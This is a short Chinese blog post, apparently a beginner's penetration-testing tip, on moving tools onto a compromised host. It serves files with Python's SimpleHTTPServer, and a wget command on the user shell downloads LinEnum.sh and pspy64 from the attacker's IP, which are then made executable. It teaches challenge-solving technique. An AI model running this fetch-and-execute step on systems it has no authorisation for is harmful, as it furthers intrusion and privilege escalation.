iT邦幫忙

0

[滲透新手小知識01]上傳檔案到User Shell

  • 分享至 

  • xImage
  •  

今天開始決定把解題過程的小撇步紀錄在這,
這系列偏向手法簡單的小動作,
每篇篇幅都短短的,
老手們就可以略過了。


正文開始!

今天假使我拿到User Shell後
我會上傳一些好用的bash或是程式到User Shell上面列舉
像是LinEnum.sh,或是pspy64等等。

那具體怎麼做呢?
概念是利用python的簡單HTTP server模組
再到你拿到的User Shell利用wget下載檔案到那邊去。


step 1 :

在你想要開伺服端的基礎目錄下利用python模組

python -m SimpleHTTPServer

預設port會是8000,這個可以自行去調整。
https://ithelp.ithome.com.tw/upload/images/20191001/20121620qJpAgNMHPc.png

step 2 :

透過下列語法:

wget <你的IP>:8000/要上傳的檔案

下面舉實際的例子來看:
原本User Shell此目錄上面的檔案:
https://ithelp.ithome.com.tw/upload/images/20191001/20121620Le4Q2myC8q.png

我們透過wget來上傳到User Shell上:
https://ithelp.ithome.com.tw/upload/images/20191001/20121620pWm5ATt9gT.png

再來用ls查看我們上傳有沒有成功:
https://ithelp.ithome.com.tw/upload/images/20191001/20121620Wv8FWVTb8m.png

成功了!
別忘了讓他可以被執行:
https://ithelp.ithome.com.tw/upload/images/20191001/20121620n0jl8hd9zb.png

Done.


就是這樣!大家再見!881!

更多文章:https://ithelp.ithome.com.tw/users/20121620/articles


圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言